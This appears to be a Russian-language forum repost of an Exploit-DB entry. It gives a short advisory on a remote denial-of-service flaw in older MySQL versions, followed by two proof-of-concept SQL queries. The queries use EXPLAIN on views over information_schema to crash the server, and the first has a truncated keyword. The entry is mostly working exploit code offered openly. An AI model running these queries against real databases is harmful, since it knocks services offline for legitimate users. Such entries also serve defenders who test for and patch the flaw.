- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 31444
- Проверка EDB
-
- Пройдено
- Автор
- MASAAKI HIROSE
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- N/A
- Дата публикации
- 2007-12-05
Код:
source: https://www.securityfocus.com/bid/28351/info
MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries.
An attacker can exploit this issue to crash the application, denying access to legitimate users.
NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be done through legitimate means or by exploiting other latent SQL-injection vulnerabilities.
This issue affects versions prior to MySQL 5.0.32 and 5.1.14.
1.
REATE OR REPLACE VIEW test_view AS
SELECT
table_schema AS object_schema
,table_name AS object_name
,table_type AS object_type
FROM information_schema.tables
ORDER BY object_schema;
EXPLAIN SELECT * FROM test_view;
2.
explain select * from (select table_name from information_schema.tables ) AS a;- Источник
- www.exploit-db.com
